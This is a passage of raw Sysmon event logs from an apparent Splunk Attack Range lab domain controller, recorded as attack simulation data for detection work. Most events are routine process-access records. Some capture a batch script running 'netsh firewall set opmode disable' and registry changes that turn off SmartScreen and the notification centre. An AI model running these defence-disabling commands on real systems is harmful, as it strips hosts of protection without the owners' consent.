Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E65B81D10528008F0039C1A159FC431F,SHA256=D40F0E20F9ED94E997BAE53B19D700FDBF086A7B13594A785DBF5290B79DB8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.929{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08059FF30D102770A6BD7CC3D64C8DCD,SHA256=6607A0D2DB06A0402BF96A2F3E5C88C51233B726F8C0CBD9200C3B24F79A00FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:35.385{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53628-false10.0.1.12-8000- 10341000x80000000000000009128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.927{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.912{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.912{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.913{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\System32\netsh.exe10.0.14393.0 (rs1_release.160715-1616)Network Command ShellMicrosoft® Windows® Operating SystemMicrosoft Corporationnetsh.exenetsh firewall set opmode disableC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=4D51BCD0B94D09F5DFB80DF754D31E28,SHA256=E5888E649C881E4BBBCE472F6808F93B2B5564D3094995A5A08E66B2406C1607,IMPHASH=51DC8B92EF1620527201E5276E21BCA7{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.896{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Policies\Microsoft\Windows\Explorer\DisableNotificationCenterDWORD (0x00000001) 10341000x80000000000000009258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.896{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.896{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.896{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.896{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.896{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.902{266CAFBE-6556-6064-3101-00000000AE01}172C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.881{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost\SmartScreenEnabledOff 10341000x80000000000000009249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.881{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.881{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.881{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.881{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
